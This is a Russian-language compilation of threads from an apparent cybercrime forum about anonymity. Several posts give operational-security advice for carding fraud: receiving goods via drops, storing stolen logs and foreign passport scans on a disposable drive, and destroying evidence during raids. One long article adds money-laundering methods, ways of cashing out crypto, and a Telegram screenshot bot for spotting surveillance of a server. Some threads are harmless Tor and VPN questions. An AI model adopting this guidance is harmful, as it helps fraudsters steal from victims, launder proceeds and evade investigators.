16) Почты, которые вы использовали для вбивов - заходите на них под защитой VPN'a и чистите все письма которые у вас только есть, затем просто завершаете сессии и выходите с акков.

**17) Товары обязательно принимать ТОЛЬКО НА ДРОПА!!!

Советую хранить компрометирующую инфу (100 ГБ логов ЮС/ фото ДЛ/паспорта жителей ЕУ) на компактном переносном ссд, который зашифрован. **(его можно быстро утилизировать в унитаз, если к вам постучат).

19) Даже в сети никак не палите свою личность , примут вашего напарника/друга, а затем сдаст он и вас, с учетом чтобы сократить срок.

20) По снг работать запрещено (посадят на бутылку быстро). Опасно работать если вы живете в usa или в других евространах.

Все зависит от объемов и количества гемора на поиски тебя - никому ты даром не нужен и искать за посылку 500-1000 тебя также никто не будет.

Click to expand...

**
В моем понимании - левый пк + настроенный антик + проксифаер + впн
+ соксы это достаточно для «безопасной» работы по Юса и Европе.

️По поводу защиты банков в целом:️**

Защита банков работает следующим образом: когда у человека списали(украли) деньги с карты – он идет в банк и пишет заявление что у него украли деньги. Там это уже не ново. Ему возвращают только 90%. Остальное достается банку. Человеку возвращают украденное из счёта банка (клиенту потом кредит не
дают ) но он точно не в - уйдёт. В конечном итоге страдает только банк - у них заложено это, тоже самое что придёте в магазин с вещами и вынести вещь, в цену заложена сумма на случаи краж.

**Мой канал =https://t.me/roxy_lair
Мой активный чат = **https://t.me/+soVeU- fk6wNjOGI6

Интересные статьи и видео клибельно)
[Как работают спецслужбы](https://href.li/?https://telegra.ph/Kak-rabotayut- specsluzhby-12-10) (статья)
[Как защитить смартфон на Android](https://href.li/?https://blog.elcomsoft.ru/2019/07/antikriminalistika- kak-zashhitit-smartfon-na-android/) (статья)
[Проверка анонимность](https://href.li/?https://telegra.ph/Proverka-anonimnost --podborka-chekerov-12-10) ( подборка чекеров )
[Чистим систему после вбива](https://href.li/?https://telegra.ph/CHistim- sistemu-posle-vbiva-12-10) (статья)
[Безопасное использование криптовалют на примере биткойна](https://href.li/?https://telegra.ph/Bezopasnoe-ispolzovanie- kriptovalyut-na-primere-bitkojna-12-10) (статья)
[Шифрование данных ПК (Windows)](https://href.li/?https://telegra.ph/SHifrovanie-dannyh-PK- Windows-12-10) (статья)
[Делаем анонимный роутер](https://href.li/?https://telegra.ph/Delaem- anonimnyj-router-12-10) (статья)
[Создаем выделенный VPN-сервер на Raspberry Pi](https://href.li/?https://arduinoplus.ru/sozdaem-vydelennyj-vpn-server-na- raspberry-pi/) (статья)
[VeraCrypt: шифруем внешний SSD диск и создаем «двойное дно»](https://href.li/?https://telegra.ph/VeraCrypt-shifruem-vneshnij-SSD- disk-i-sozdaem-dvojnoe-dno-08-31-2) (статья)
Удалите шпионаж Windows и возьмите компьютер под свой контроль (статья)
DPN — децентрализованный VPN на блокчейне (видео)
Socks 911 раздаем по WI-FI Hotspot (видео)
Как скрыться от государства метод Сноудена (видео)
Безопасность, защита, шифрование (плейлист 49 видео)

Как пустить весь траффик через TOR

ID: 676533bbb4103b69df371cf1
Thread ID: 33446
Created: 2019-11-25T14:15:49+0000
Last Post: 2020-04-13T12:29:17+0000
Author: Koklush
Replies: 57 Views: 13K

Небольшой гайд для не знающих.
1)Качаем и устанавливаем Proxifier (не важно откуда)
2)Качаем и устанавливаем TOR + открываем его(обязательный пункт)
3)В Proxifier заходим во вкладку Profile->Proxy Servers,нажимаем на кнопку add и добавляем - Address:127.0.0.1 | Port:9150 | Protocol - SOCKS5 и нажимаем ОК
4)Заходим на 2ip и видим ,что у нас траффик идет через ТОР -> Радуемся

Анонимность, безопасность TOR (общая тема)

ID: 676533bbb4103b69df3718f3
Thread ID: 12883
Created: 2006-10-25T15:03:37+0000
Last Post: 2024-12-04T19:22:35+0000
Author: qwe123
Replies: 101 Views: 12K

Хотелось бы услышать, мнения о торе, доки то я читал, но интересен опыт людей которые с ним работают, действительно ли это так зашифровано и надежно? :bang:

Раздача VPN config на месяц, обходим блокировки

ID: 676533bbb4103b69df371919
Thread ID: 120426
Created: 2024-08-08T13:20:18+0000
Last Post: 2024-10-16T09:02:42+0000
Author: white_1337
Replies: 108 Views: 12K

В связи с закручиванием гаек на блокировки ресурсов, раздаю VPN,
Гарантирована работа Youtube, Walt Disney, Warner Bros., Sony Pictures, Universal Pictures, Netflix, Megogo,
Spotify, Universal Music, Amazon Prime Video, WarnerMedia

Раздам configs на VPN, срок работы конфига 1-н месяц с момента передачи,
В наличии конфиги на следующие VPN технологии

WireGuard
L2TP / IPSec
OpenVPN
IKEv2
Shadowsocks
V2Ray

Локации серверов

North America
Europe
Asia & Middle East
South America

От вас, иметь настроенный соф, либо уметь настраивать софт для использования конфига!
Отписывайте мне в теме

Технологию подключения
2. Локацию
3. Получаете конфиг proffit!

Как меня принять пытались. Или история о том как сохранить анонимность.

ID: 676533bbb4103b69df371ac8
Thread ID: 26996
Created: 2018-12-21T18:45:37+0000
Last Post: 2022-08-26T01:14:22+0000
Author: Hannibal
Replies: 28 Views: 12K

Дорогие форумчане на этом форуме я первый раз (пришел с другого) и решил сразу принять участие в вашем конкурсе.
Попрошу поддержать меня порцией свежих лайков. Ну или как Вы там поддерживаете

Поговорим о анонимности.

Что бы было интересно читать вот Вам выжимка из статьи:
1. Тру стори из реальной жизни:smile76:
2. TOR,VPN ху"ня против такого понятия как случайное стечение обстоятельств.
3. Может в интернете ты защищен на 100%, но вот в реальной жизни ты можешь жестко лохануться.
Интересно? Читай статью:smile22:

У всех есть телеграмм, верно? И я уверен что Вы подписаны на великое множество пабликов связанных с теневыми сферами, а ну и конечно же переписываетесь с кем нибудь о том как Вы жестко кинули мамонта или подготавливаете какую нибудь чернуху. Конечно же адекватный человек все переписки удаляет, но я же знаю какие Вы ленивые:smile12: можете забыть что нибудь удалить, забить хер, ну Вы поняли)

Так вот не так давно сижу я с другом в своей машине возле его дома, на часах 12 ночи базарим о жизни так сказать. Неспеша подъезжает ко мне иномарка (что довольно таки странно, так-как машину я не знаю) выходит мужик и чешит ко мне. Открываю дверь и тут такой вопрос "пацаны можете присветить" та базара ноли врубаю фонарик и через секунду вижу возле лица ксиву, аля тов. майор вечер добрый:smile81:
Вежливо просит выйти из машины и предъявить документы (причину не объясняет) ну думаю понтоваться не буду мало ли что. Пока кореш пошел домой за документами спрашивает у меня чем занимаешься и че тут делаешь. Говорю в такси подрабатываю и вот с работы ехал заскочил до кореша. Можешь показать телефон? Спрашивает меня ( кто в теме знает что у таксистов есть прога на телефоне). Ну я же без задней мысли разблокирую телефон и тычу ему в лицо и..... через секунду телефон у него и он уже в телеграмме:smile91: мудила вырвал прям из рук. Ну а там естественно переписки+ чаты и т.д (благо прям серьезного ничего нет). Засунул телефон в карман и попросил выложить содержимое карманов на капот.:smile22:

После этого объясняет что его среди ночи подняли так-как в данном районе замечена машина которая ездит и раскидывает закладки. Догадайтесь какая машина, правильно такого же цвета и марки как у меня:smile60:

В общем не долго думая грузят меня и везут в участок подозревая что я закладчик. Дальше в течении часа лазит в телеге и пытается вывести на чистую воду такими вопросами как: когда последний раз принимал, как зарабатываешь на жизнь и т.д Честно ему признался что последний раз 6 лет назад пробовал триганде и вообще поехали в больницу проверяться я чист. И если хочешь вызывай понятых и давай посмотрим что у меня в машине. Дальше он понял что с наркотой я не связан, но видит что в телеге у меня все группы с дарк тематикой. И знаете как я отмазался? Сам в шоке, но загнал тему про то что я хочу стать гарантом и изучаю кухню изнутри и вообще я на белой стороне и помогаю людям :smile63:
Не хотя он поверил и так-как ему в падлу было под меня копать отпустил домой. Не буду скрывать что всё это время одно место у меня было так сужено:smile62: что не пролезит самая тонкая иголка:smile75:

Суть!

Дорогие друзья как бы хорошо Вы не защищались в сети знайте что :smile62: может прийти с любой стороны, даже оттуда откуда вы не могли предположить! Благо что всё хорошо закончилось, но представьте на мгновение что менту было бы не пофиг и он бы начал копать сами понимаете что могло произойти)

Я надеюсь эта статья была для Вас полезна и чему нибудь научила. А я ещё раз хочу напомнить Вам что на данном форуме я новичок и не откажусь от небольшой благодарности в виде лайка:smile8: ну и было бы не плохо занять какое нибудь место в конкурсе статей.

Если есть вопросы или предложения пишите в ТГ @Gannibal1
Сейчас работаю по теме с подменой номера, но это если кому интересно)

А Вам а преддверии нового года пожелаю больших профитов и сказочно тупых мамонтов:smile79:

Средство для безопасного общения в 2к21

ID: 676533bbb4103b69df3718e1
Thread ID: 48071
Created: 2021-02-13T23:58:33+0000
Last Post: 2024-12-19T20:33:58+0000
Author: wh1tew0lf
Replies: 81 Views: 11K

Какие сервисы использовать для безопасного общения тета-тет? С шифрованием и т.д и т.п. На счёт Telegram, Wickr сразу летят в топку
Взор был устремлен поднять сервер jabber'a, но хорошего материала не нашел.
В перспективе, чтобы поддерживал и мобильные уст-ва

«Ростех» собрался продать ФСБ программу для деанона интернет-пользователей

ID: 676533bbb4103b69df371999
Thread ID: 84479
Created: 2023-03-25T13:41:16+0000
Last Post: 2024-03-07T18:37:45+0000
Author: DukeEugene
Prefix: Статья
Replies: 94 Views: 11K

«Ростех» собрался продать ФСБ программу для деанона интернет-пользователей

«Ростех» обладает программой, способной вычислять анонимных пользователей интернета, включая администраторов телеграм-каналов. Ее хотят начать продавать силовикам, в том числе ФСБ и МВД, уже в этом году, говорится в совместном расследовании «Медузы» и The Bell.

Входящий в корпорацию концерн «Автоматика» купил разработку петербургской IT- компании T.Hunter еще осенью 2021 года. Программный комплекс «Охотник» может устанавливать владельцев аккаунтов с помощью нейросети, которая исследует открытые источники данных: соцсети, блоги, форумы, мессенджеры, доски объявлений, блокчейны криптовалют, даркнет и госсервисы. Помимо этого, доступ к своим базам предоставляют силовики. Общее число интегрированных источников данных — свыше 700 единиц.

Программа способна проводить анализ более трех десятков идентификаторов: имен, никнеймов, адресов электронной почты, сайтов, доменов, криптокошельков, ключей шифрования и прочего. Дальнейший деанон идет по номеру телефона, геолокации и IP-адресу, утверждает источник, знакомый с деталями разработки.

Самий лучший VPN сервис?

ID: 676533bbb4103b69df371d6b
Thread ID: 21033
Created: 2011-01-23T20:12:14+0000
Last Post: 2019-02-25T10:00:25+0000
Author: kururugi
Replies: 29 Views: 11K

Скажите пожалуйста, какой саммий лучший VPN?

Мне надо, что бы не ныь совсем дорогой, никаких логов не сохранял и было обеспечено что моё настаяэщее ИП никогда никому неотдает.

Есть такой сервис, или я должен себе дедик подставить?

WebMoney

ID: 676533bbb4103b69df371dfb
Thread ID: 5191
Created: 2005-10-17T20:34:14+0000
Last Post: 2006-06-20T21:28:11+0000
Author: segment
Replies: 27 Views: 11K

У меня такой вопрос. Какой протокол и порт использует прога WebMoney Keeper и можно ли сделать для нее проксю?

Анонимность, безопасность VPN (общие вопросы).

ID: 676533bbb4103b69df3718ec
Thread ID: 72717
Created: 2022-08-10T09:44:30+0000
Last Post: 2024-12-12T21:25:41+0000
Author: TommyVic
Replies: 148 Views: 10K

Is IPBurger any good ?

Whonix, обсуждение

ID: 676533bbb4103b69df3718ff
Thread ID: 100588
Created: 2023-10-21T13:27:28+0000
Last Post: 2024-11-24T22:48:37+0000
Author: michail
Replies: 183 Views: 10K

Неожиданно возникла проблема на машине у человека.
Whonix наотрез отказался соединятся с Тор сетью. И пришлось в цепочку добавлять прокси. К нибудь столкнулся с такой проблемой?
Плохо, что бесплатно найденные прокси сплошь все медленные, это из тех кто смог пропустить трафик правильно и смог работать.
Вторая проблема в том, что если заказывать платный прокси, то хостер этих проксей видит сам ПК. Анонимность будет вопрос доверия к хостеру. Что стоит под ОГРООООМНЫМ.
Вопросом. Как быть и что делать?
Предположение ниже
Ранее в сми была статья, что спецов из Китая нанимают блокировать наш ТОР. Это их плоды труда мы наблюдаем? Вопросы такие ко всем, кто использует.
Заметил, что трафик тор который с обратным адресом, т.е. исходит из "железной" ОС не блокируется! В связи с этим предположение, что провайдеру используют запись логов. И тот ПК который они не могут определить адрес выдают команду на блокировку трафика. Те ПК у которых определили точный адрес - провайдеры записывают логи.

Как тебя примут и где ты спалишься? Мой опыт.

ID: 676533bbb4103b69df371912
Thread ID: 108108
Created: 2024-02-12T16:01:20+0000
Last Post: 2024-11-05T15:03:37+0000
Author: OnionNord
Prefix: Статья
Replies: 36 Views: 10K

Автор: OnionNord
Специально для: xss.is

Привет всем, хочу в этой статье немного рассказать о Вашей безопасности и анонимности (существует ли она?), что делать если к тебе уже ломятся. Как вести дела, общаться и не сесть далеко и надолго. Я не буду тут уделять много времени связкам по типу VPN-TOR-VPN и OpenWRT роутерам, так как на форуме уже давно все есть и все подробно расписано и очевидно. Я привлекался по 18 U.S.C. § 1957 и 18 U.S.C. § 1956, разделы указывать не буду. В конечном итоге я получил относительно небольшой штраф и потерял 3 месяца своей жизни. Так что, какой-никакой опыт имеется. За это время я вынес несколько уроков и золотых правил, ими я и поделюсь с вами.

Небольшое вступление.
Как я выше уже написал, я не хочу тут разбирать всякие связки, аля VPN-TOR- VPN, насчет этого я скажу только одно, в большинстве случаев разработка идет с конца, вам важно скрыть вашу выходную точку. Как таковой анонимности не существует - вас будут искать и о вас будут знать, рано или поздно СКОРЕЕ ВСЕГО тебя примут, если ты вовремя не прекратишь, ты должен думать наперед, продумать все ходы мусоров, как тебя будут атаковать и что сделать, чтобы эта атака была безуспешна, вместо того, чтобы сидеть и добавлять бесконечно впн аккаунты, которые ты купил за биткоины, которые ты купил со своей карты. Все что когда-либо было в сети - никогда не будет анонимным.

Часть первая. Язык мой - враг мой.
По заголовку думаю все понятно, не понтуйся, особенно перед телками, какой ты крутой хакер или кардер. Не говори о своих делах даже самым близким, даже отцу с матерью, о "близких друзьях, с которыми мы до конца" я вообще молчу, тебя сольют, сольют при первой же угрозе, и сольют так, что окажется, что ты еще основатель какого-нибудь наркокартеля.
Работай один, связи имей только виртуально и ничего, АБСОЛЮТНО НИЧЕГО, не рассказывай о себе, где живешь, сколько лет, как зовут. В последствии, когда тебя примут - всю эту информацию будут использовать против тебя, помнишь в фильмах всегда слышал: "Вы имеете право хранить молчание. Всё, что Вы скажете, может быть и будет использовано против Вас в суде.", так вот это правда, заруби себе на носу.
Никому, абсолютно никому, не рассказывай о своих делах, для окружающих ты - фрилансер, либо бизнесмен, там уже сам придумывай себе легенду, главное, чтобы когда тебе зададут вопрос: "Уважаемый, откуда деньги?", ты всегда мог подкрепить свои слова "о клиентах миллионерах на фриланс бирже" бумагами.

Приведу пример хорошего знакомого, на тот момент, которого подставили его же понты, с ним мы шли по одному делу одной группировки.
Сам он из небольшого городка, делал деньги в Китае и в итоге связался с той самой плохой компанией, о которых тебе рассказывала мама в детстве. Начал отмывать грязь через биржу, летал постоянно за границу, жил в теплых странах. А попутно он занимался музыкой, и ведь ему надо было закрепить свой "образ гангстера", начал выкладывать доллары к себе в инстаграм, потом выяснилось, что через его аккаунт на бирже прошло что-то около 300-400к$, заинтересовал этим ФБР, попал в разработку, уведи его инстаграм, это тоже стало зацепкой. Короче говоря, спустя время, когда он прилетел в США - его успешно въебали ФБР в 5 утра, предъявив ему при этом его переписку с джаббера. Дали ему меньше года, если не ошибаюсь, т.к. это его первое дело в США. Насколько я знаю, сейчас он продолжает там жить, давно не поддерживаем связь.

Какие выводы можно сделать? - Не понтуйся, ничего и никому не рассказывай, как я упомянул это выше, используй везде разные никнеймы и разную почту, вспомните историю основателя Silk Road, сыграла либо глупость, либо человеческий фактор. Я ниже подробнее расскажу об этом.

Часть вторая. Человеческий фактор.
Он может сыграть с кем угодно, не спорю, ты даже сам не поймешь.
Как я выше упомянул в выводах о деле знакомого и основателя Silk Road, КАТЕГОРИЧЕСКИ НЕЛЬЗЯ использовать одинаковую почту, никнеймы, дату рождения, не дай бог имя или фамилию.

(Сейчас будут мои предположения на основе того, что я слышал и читал.) Объясню. Существует софт, там все заполняют, как Вас зовут, где живете, предпочтения, Вашу машину и т.д., на основе этого софт брутит ваши логины, пароли, и т.д. Условно, Вас зовут Вася Пупкин, вы родились 01.02.1984г. и собаку Вашу зовут Дженни, допустим. Софт анализирует полученную информацию и брутит, vapu01jen и т.д., ну вы поняли. Обычно это используют, когда Вас уже приняли и пытаются вскрыть какой-нибудь криптоконтейнер.

Продолжая говорить о человеческом факторе, всегда, абсолютно всегда когда ты отходишь от ПК - нажимай волшебную кнопку в VeraCrypt "Размонтировать всё", безопасность это не про удобство, твоя свобода не стоит твоей лени в очередной раз ввести пароль. Тебя будут принимать, по крайней мере в России (Да и возможно во всем СНГ), когда ты пойдешь за хлебом в магазин или откроешь дверь курьеру. Далее, спойлер, тебя втыкают лицом в землю, забирают твои ключи и со специалистами заходят в квартиру, опечатывают ПК.

Общение. Если ты общаешься с кем-то в сети - общайся так, как не общаешься в жизни. Если от лица Васи Пупкина ты пишешь примерно так:"лол вау ахаха))))))00)", то когда ты сидишь как "TrueHacker", выбери себе другой стиль общений. Это все будет зацепкой в любом случае. "Вы имеете право хранить молчание. Всё, что Вы скажете, может быть и будет использовано против Вас в суде.", - я это напишу еще 10 раз, вы просто должны это запомнить как молитву "Отче Наш".

Часть третья. Железо.
У тебя должно быть две личности, первая - Вася Пупкин, это та, с который ты общаешься с друзьями во ВКонтакте (???) и смотришь ролики на ютубе. Вторая - TrueHacker, с которой ты работаешь. И эти две личности должны быть на разной технике, далее поговорим про ту технику, на которой ты работаешь.

Начнем с самого начала. Покупка техники. Найди себе хороший ноутбук или ПК, на котором ты будешь работать, бери ТОЛЬКО Б/У и ТОЛЬКО за наличные. Лучше всего работать с отдельной квартиры, но если такой возможности нет - ноут неси в отдельную комнату. Я работаю в перчатках, обычные от порезов и проколов, медицинские не советую, они все равно могут оставить твои отпечатки. Зачем это? Когда меня принимали - везде начали снимать отпечатки пальцев, и о чудо, на рабочей технике их не было, ведь "это все не мое". А еще я вам советую приобрести мини пылесос и постоянно убирать с клавиатуры волосы и т.д., я в десятый раз повторю, все, где Вы забили или забыли - будет использоваться против Вас.

Система. Не используй на рабочей машине всякие дистрибутивы, что тебе не нравится в обычной убунту? В ней есть все тоже самое, что и в Кали каком- нибудь. В Убунту нет никакой телеметрии, используй эту ось и не парься. Поставь себе всю систему на английский язык.

Не держи все яйца в одной корзине. Доступ к интернету (Whonix) на одном контейнере, вторая рабочая система - на другом. Пароли (???) другие данные - на третьем. Потрать 20-50$ и купи себе качественные Micro SD, многие говорят, что они быстро умирают, не знаю, у меня живет и функционирует уже более года. 50$ не стоят твоей свободы. Почему Micro SD, а не SSD? Быстрее и проще уничтожить. Когда куда-то уходишь - прячь в надежное место эту карту. На тот момент у меня было 2 Micro SD, одна была всегда спрятана в карнизе, вторая за розеткой. Когда был обыск, перевернули абсолютно все, вскрыли телевизор, из горшков достали цветы, крышку часов сняли даже, поразбирали блоки питания от монитора и т.п. Еще хорошее место, ИМХО, это спрятать куда-нибудь в дезодорант, или в дверь, думайте, все ограничивается вашей фантазией, я уже говорил, что безопасность это не про удобство. Когда тебя будут принимать - ты запаникуешь, адреналин подскочит, сердце будет биться, а руки трястись, у тебя пролетит миллион мыслий в голове, ты поймаешь такой тупняк, какой не ловил еще никогда в своей жизни.

Пароли. Используй длинные предложения или тупо набор слов 100+ символов, лично у меня 190+ символов везде пароли, АЛЬТ КОДЫ, ты их можешь крутить-вертеть как душе твоей угодно, пробелы используй, используй кириллицу, используй символы. Сделай все, чтобы при бруте они ничего не получили, но, терморектальный криптоанализатор никто не отменял, на такой случай - ешь свою карточку, перекуси зубами, я не знаю, лучше лишиться зуба, чем сесть на пару-тройку лет. Нет тела - нет дела.

Часть четвертая. Крипта и наличные.
Большинство палится на деньгах, кто-то принимает с обменника на свою карту, кто-то принимает деньги на свой бинанс или другую биржу, на которой ты прошел KYC (Know Your Customer), это самые банальные ошибки, на которых ты можешь проебаться, ну либо тебя мусора схватят у банкомата, когда ты будешь через QR от желтого банка снимать полмиллиона.

Принимай деньги на ХОЛОДНЫЙ кошелек, забудь про существование бирж, делай себе флешку с кошельком и криптуй ее или же купи какой-нибудь Леджер, хотя после недавней истории с ним.. Главное быстро принять крипту и потом ее в наличку, не держи в коине деньги, рынок постоянно скачет. В общем и целом, решайте сами, но про так называемые горячие кошельки забудьте. Какой криптой принимать деньги? Точно не USDT и ему подобные, тот же USDT блокируют направо и налево, а там уже потребуют KYC, оно вам надо? После того как приняли деньги, далее обнал. Про обменники с бестченджа забудьте тоже, найдите лучше на форуме и отдайте им свои биткоины, не отменяет тот факт, что они могут быть тоже под мусорами . А в замен получите QR или клад, тут уже вам решать, ничто из этого не безопасно.

Часть пятая. Связь и общение.
Во-первых, не использовать телефон для общения, ВООБЩЕ.
Забудь про телеграм, да, его можно купить анонимно и использовать в связке с тором, но все равно, к чему эти риски? Если работа вынуждает использовать телеграм, то только купленный за Monero и только использовать через веб версию в связке с TOR+VPN. Твой бро - Element, Jabber. Чтобы использовать джаббер, надо будет настроить все правильно, использовать его только с шифрование PGP или OMEMO, файлы в нем передаются без шифрования, учтите это. Элемент же использует децентрализованный Matrix.
Твой бро - Element, Jabber, TOX.
Твой НЕ бро - Telegram, Signal.

Часть шестая. Твой дедик будет атакован.
Если ты работал с дедика и оплачивал его с кошелька, на который ты, например, принимал деньги и обналичивал, то когда ты будешь в разработке тебя будут атаковать со всех сторон, в том числе и твой дедик. А может и селлер сидит и мониторит твои действия, чтобы в дальнейшем тебя слить мусорам, а то у него заберут лицензию? Как узнать об этом, о том что кто-то следит?

Ничего сложного по сути нет, но для этого, к сожалению, понадобится телеграм. Покупаем аккаунт/регистрируем самостоятельно за Monero или биткоины, далее заходим на веб версию на хуниксе.
Ставим питона на дедик и ставим себе библиотеки:

Code:Copy to clipboard

pip install pypiwin32
pip install pytelegrambotapi
pip install pillow

Следующим шагом мы создаем своего бота в BotFather в телеграм.

Cоздаем на рабочем столе файл с любым названием и делаем расширение .py, вставляем код:

Code:Copy to clipboard

from PIL import ImageGrab
import telebot
from io import BytesIO
from win32api import GetSystemMetrics
import time
token = "token"
bot = telebot.TeleBot(token)
chat_id = "chat_id"
while(True):
  try:
    ss_region = (0, 0, GetSystemMetrics(0), GetSystemMetrics(1))
    ss_img = ImageGrab.grab(ss_region)
    bio = BytesIO()
    bio.name = "Screenshot.jpg"
    ss_img.save(bio, "JPEG")
    bio.seek(0)
    bot.send_photo(chat_id, photo=bio)
    bio.close()
    time.sleep(10)
  except Exception as e:
    print(e)
    time.sleep(1)

Копируем токен бота и вставляем его в код, заменив token и chat_id. Отлично. Запускаем скрипт в терминале:

Code:Copy to clipboard

python name.py

Теперь, когда кто-то захочет посмотреть чем вы там таким занимаетесь интересным, вы сразу узнаете об этом, бот пришлёт вам в чат скриншот рабочего стола. И потом вы быстро среагируете и очистите все данные, в лучшем случае.

Часть седьмая. Как отследят ваши битки?
Ни для кого не секрет, что биток не анонимен, все легко отслеживается, и если вы когда-то купили монету со своей карты, а потом приобрели какой-нибудь софт для своих темных делишек, или еще чего хуже, и до сих пор пользуетесь этим, то вот вам немного паранойи:

bitref.com - Проверка биткоин кошелька.
blockexplorer.com - Обозреватель блоков, он позволит кому угодно отследить куда и когда уходят ваши деньги с вашего биткоин кошелька.
blockchain.com - аналогично.
cryptocurrencyalerting.com - Этот сервис позволит любому человеку поставить алерт на ваш кошелек, и когда будет какая-нибудь активность на вашем кошельке то человек сразу об этом узнает.
www.blockseer.com - Визуализация связей между адресами, которые участвовали в транзакциях.

И это только то, что доступно обычному гражданскому лицу, а что есть у трехбуквенных...))

Часть седьмая. Как тебя будут принимать?
Я уже выше писал об этом, тут просто объединю все.
За СНГ буду говорить по опыту своих хороших знакомых. Приведу его пример сюда, с его же разрешения.
"Взяли за зад в тот момент, когда выходил из подъезда, сходу летит по печени, я скручиваюсь в колачик и мордой в пол, как в лучших боевиках. Ключи забирают и с задротами-айтишниками заходят в квартиру, меня следом за ними, сразу говорят, показывай что где есть)). Короче отдал два ноута, на всех еще вера стояла, все зашифровано. На месте ничего не смотрели, всю технику забрали, телефоны, два ноутбука, основной ПК, диски и флешки, машину конфисковали, мне мешок на голову, стяжки на руки, и в отдел, всю дорогу задавали вопросы, мол, чем занимаюсь, зачем, почему и когда. На удивление, были вежливые, хоть и дали пизды вначале, но спасибо что пальцы не ломали и паяльник не использовали. В итоге нихуя не нашли, дали условку, технику вернули через 2 месяца, а машину нет))"

За себя я могу сказать, что было так:
Отключают все электричество и под стук и крики "эфбиай оупен ап" заставляют открыть им дверь. Далее, пока ты спросонья судорожно все чистишь (в моем случае ничего чистить не пришлось, позаботился об этом заранее), потому что к тебе пришли в 4-5 утра, тебе тараном вежливо открывают дверь и сват тим с автоматами добровольно-принудительно заставляют принять горизонтальное положение. Я же открыл дверь, выбора особо не было, передо мной человек 5-6, как будто я в фильм попал. Сразу вопросами засыпать начали, если ли оружие или наркотики, и в отдел меня потом, а после пришлось адвокатам отвалить.

Выводы.
Получив наличные, ты все равно не можешь идти покупать себе мерседес, точнее, можешь, если он какого-нибудь 2000-го года на упавшей пневне и весь в рыжиках. Далее тебе надо легализовать деньги, самое простое - делать чеки на "услуги консультации" и т.п., что отследить никак нельзя. Можешь отмывать через фриланс, но в таком случае тебе надо кучу карт, а то если у тебя будут покупать постоянно только за биткоины, то будет странно, не правда ли? Открывать оффлайн бизнес - надо сделать все ювелирно, если твое кафе принесет тебе 3 миллиона за месяц то тоже будет странно, по камерам просто отследят сколько человек к тебе заходило за месяц и сделают выводы. Автомобили и недвижимость покупать ТОЛЬКО в кредит или рассрочку. Смотри в сторону айти.

Не занимайтесь криминалом. Всем добра.

Как фастом уничтожить компьютер

ID: 676533bbb4103b69df3719f0
Thread ID: 74560
Created: 2022-10-21T20:08:55+0000
Last Post: 2023-10-31T16:46:16+0000
Author: utsy21
Replies: 167 Views: 10K

занимаюсь чернухой и боюсь что когда то ворвутся гости как уничтожить компьютер за 5-15 секунд? (кроме usb killer) киньте какой то вирус который уничтожит систему без возможности восстановления или что то другое

Антидетект браузер на основе Firefox

ID: 676533bbb4103b69df371bb5
Thread ID: 27780
Created: 2019-02-10T17:18:56+0000
Last Post: 2021-08-26T14:29:49+0000
Author: lukas
Replies: 24 Views: 10K

Антидетект браузер на основе Firefox /// Firefox-based Antidetect browser

Cource code - https://github.com/vektort13/AntidetectFirefox/

мануал по сборке - <https://developer.mozilla.org/en- US/docs/Mozilla/Developer_guide/Build_Instructions>

кто пробовал? делитесь мнениями!

Linken Sphere 6.5

ID: 676533bbb4103b69df371ca7
Thread ID: 26291
Created: 2018-10-09T16:52:36+0000
Last Post: 2020-08-28T05:53:18+0000
Author: xrahitel
Replies: 30 Views: 10K

Spoiler: 3 у вас 45

Скачать и установить на диск д (но не обяз, вроде) Переименовать в корне файл exe Линкин сфере на Линкен сфере ТЕСТ.
1.видео тыц
2.скачать тыц
p.s pass xrahitel

Самый полный в России гайд по анонимности

ID: 676533bbb4103b69df371cfc
Thread ID: 34867
Created: 2020-02-10T08:42:18+0000
Last Post: 2020-03-12T08:32:00+0000
Author: Chook
Prefix: Статья
Replies: 39 Views: 10K

*Под какие тематики попадает моя серия статей? Ну на самом деле даже под несколько, будет и криптография и криминалистика) А вообще это будет как я думаю самый полный русскоязычный гайд по анонимности, чтобы понять как человека найти нужно знать и как спрятаться.
Дисклеймер:
Неужели это очередной гайд от школьника который опять будет втирать мне какую то дич? Нет! Тут будет только концентрированный опыт. Так кому же полезна будет данная статья, ответ достаточно простой. Если ты уже используешь связку qubes + whonix- gw, то в принципе можешь закрыть эту статью. Но тебе все равно стоит прочитать мою заключительную статью где я расскажу про то что будет с нашей анонимностью лет через 10 и как на нее повлияет ИИ(искуственный интеллект), ну и разумеется как от него защититься.
Так в чем отличие моей этой статьи от остальных сотен, а может и тысяч остальных гайдов? Это не очередное «обуыение» по установке ПО, где разве что нужно, так жать «далее». Не будет пересказа документации, читайте ее сами, источники я вам скину. Подход будет систематизированный, да еще и прикрепленный личным опытом. А главное я вам расскажу как самому рабраться в данной теме, а не платить людям и/или ждать подобных статей. То есть я вам дам не рыбу, а удочку) Но не бойтесь будут и полезные советы, которые стоит начать использовать прямо сейчас, и не требуют никаких усилий. Советую дочитать эту статью до конца, там будут полезные ссылочки.

Spoiler: план цикла статей

Все в порядке важности
1. Шифрование диска. Поведение для сохранения анонимности
2. Почему вы просто обязанны перейти на qubes + whonix- gw, анонимная разработка программ
3. Ну о том что через 10-15 лет ожидается изобретения квантового компютера, ИИ для деанонимизации пользователей bitcoin, что еще вполне может делать ИИ для деанонимизации пользователей, как его обманывать, ограничения ИИ

Когда не специалист задумывается об анонимности, то скорее всего начнет действовать по принципу чем больше тем лучше, длинные цепочки прокси, дабл, трипл, квадро впн. Так еще между ними вставит tor. Но вся проблема в том, что это очень часто совсем не помогает, да и когда появятся первые проблемы, с которыми он не сможет справиться за 5 минут, то вероятно такой «хакер» откатиться обратно на винду и хорошо если будет работать через какой нибудь относительно надежный впн.
Но если посмотреть как чаще всего вычисляют людей, то можно заметить, что это не какая то супер секретная разработка от АНБ, не хитрые приемы социальной инженерии, не долгие разработки специальных агентов. А банальная глупость, небрежность, пофигизм и чувство безнаказанность. Так вот, в первой части будет рассказано как с этим бороться. И это будет куда полезнее чем цепочка из 10 vpn->tor->vpn->.
Наверное самое первое, что просто ОБЯЗАН сделать человек, беспокоящейся за свою свободу, это зашифровать систему. И тут уже можно вспомнить пару абсолютно абсурдных, но до сих пор достаточно популярных идеи среди непрофессионалов:
Раз я зашифрую диск, то всем сразу станет ясно что я преступник и меня за это посадят. Ну эта мысль не выдерживает вообще никакой критики, потому что в УК РФ нету статьи за шифрование, так и нету статьи за отказ от предоставления ключа.
Часто еще встречается идея, что шифрование не имеет смысла, потому что потом все равно под пытками ты все выдашь. Ну эта идея хотя бы имеет права на жизнь, но то же не такая уж и умная.

| Тебя не начали пытать/ты не сломался| Тебя начали пытать
---|---|---
